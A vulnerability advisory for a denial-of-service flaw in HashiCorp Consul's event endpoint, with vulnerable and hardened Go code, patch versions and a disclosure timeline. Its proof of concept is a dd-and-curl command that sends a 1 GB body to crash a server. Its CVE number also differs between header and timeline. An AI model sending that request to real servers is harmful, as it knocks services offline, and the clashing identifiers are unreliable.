ADVISORY INFORMATION

Product: HashiCorp Consul
Vendor URL: https://developer.hashicorp.com/consul
CWE: Memory Allocation with Excessive Size Value [CWE-789]
Date found: 2025-09-19
Date published: 2025-11-02
CVSSv4 Score: 7.1 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
CVE: CVE-2025-11375

VERSIONS AFFECTED

Consul Community Edition <= 1.21.5
Consul Enterprise <= 1.21.5, 1.20.7, 1.19.9 and 1.18.11

INTRODUCTION

Consul is a service networking solution that enables teams to manage secure network connectivity between services, across on-prem, hybrid cloud, and multi-cloud environments and runtimes. Consul offers service discovery, service mesh, identity-based authorization, L7 traffic management, and secure service-to-service encryption.

(from the vendor’s homepage)

VULNERABILITY DETAILS

Consul’s event endpoint at “/v1/event/fire/” is vulnerable to a denial-of-service condition. The handler reads the request body into memory without imposing a limit on the Content-Length:

// Get the payload
if req.ContentLength > 0 {
    var buf bytes.Buffer
    // io.Copy reads until EOF; nothing caps how many bytes end up buffered
    if _, err := io.Copy(&buf, req.Body); err != nil {
        return nil, err
    }
    event.Payload = buf.Bytes()
}

Because the server trusts the client-supplied Content-Length, an attacker who can authenticate to the API can send a request with an arbitrarily large body. Consul allocates a buffer proportional to the incoming data, eventually exhausting the process’s memory and causing Consul to crash or become unresponsive.

Successful exploits can allow an authenticated attacker to crash the Consul service.
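
The hardened counterpart of the handler fragment above, written as an added example for this advisory rather than taken from Consul’s fix: it rejects an oversized declared Content-Length before reading and wraps the body in http.MaxBytesReader so that a client that omits or understates Content-Length is cut off at the cap as well. The cap value and the helper names are assumptions for the example.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
)

// maxEventPayload is an assumed cap chosen for this example, not Consul's value.
const maxEventPayload = 512 * 1024

// readPayloadBounded is the hardened counterpart of the handler fragment quoted
// in the advisory: it rejects an oversized declared Content-Length up front and
// wraps the body in http.MaxBytesReader, so a client that omits or understates
// Content-Length still cannot get more than maxEventPayload bytes buffered.
func readPayloadBounded(w http.ResponseWriter, req *http.Request) ([]byte, error) {
	if req.ContentLength > maxEventPayload {
		return nil, fmt.Errorf("declared length %d exceeds %d", req.ContentLength, maxEventPayload)
	}
	req.Body = http.MaxBytesReader(w, req.Body, maxEventPayload)
	var buf bytes.Buffer
	if _, err := io.Copy(&buf, req.Body); err != nil {
		// MaxBytesReader returns an error as soon as the cap is exceeded.
		return nil, fmt.Errorf("reading event payload: %w", err)
	}
	return buf.Bytes(), nil
}

// newFireRequest builds a PUT to the event endpoint with a constructed body of
// size bytes. With declareLength=false the request carries no Content-Length
// (ContentLength == -1), as a chunked client would send it.
func newFireRequest(size int, declareLength bool) (*httptest.ResponseRecorder, *http.Request) {
	var body io.Reader = bytes.NewReader(bytes.Repeat([]byte("A"), size))
	if !declareLength {
		body = io.MultiReader(body) // hides the concrete type so httptest cannot infer the length
	}
	req := httptest.NewRequest(http.MethodPut, "/v1/event/fire/test", body)
	return httptest.NewRecorder(), req
}

func main() {
	w, req := newFireRequest(maxEventPayload+1, false)
	_, err := readPayloadBounded(w, req)
	fmt.Println("oversized body without Content-Length rejected:", err != nil) // true
}
```

A body of exactly maxEventPayload bytes is still accepted; only the byte past the cap triggers the error, so the limit can be tuned to the largest legitimate event payload.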

PROOF OF CONCEPT

dd if=/dev/urandom bs=1M count=1000 of=/tmp/event_payload.bin
curl --http1.1 -X PUT --data-binary @/tmp/event_payload.bin http://[address]:8500/v1/event/fire/test

SOLUTION

Update Consul Community to version 1.22.0
Update Consul Enterprise to 1.22.0, 1.21.6, 1.20.8 or 1.18.12

REPORT TIMELINE

  • 2025-09-19: Discovery of the vulnerability
  • 2025-09-19: Contacted the vendor via their security@ address
  • 2025-09-22: Vendor sends initial response
  • 2025-09-24: Vendor confirms the vulnerability
  • 2025-10-06: RCE Security asks for the estimated patch date
  • 2025-10-06: Vendor responds stating they want to ship fixes in the 1.22.0 release
  • 2025-10-06: Vendor (CNA) assigns CVE-2025-11374
  • 2025-10-15: Vendor sends another update stating the release is planned for 27 October
  • 2025-10-27: Vendor publishes updates that fix the vulnerability
  • 2025-11-02: Full Disclosure

REFERENCES

https://discuss.hashicorp.com/t/hcsec-2025-28-consuls-event-endpoint-is-vulnerable-to-denial-of-service/76723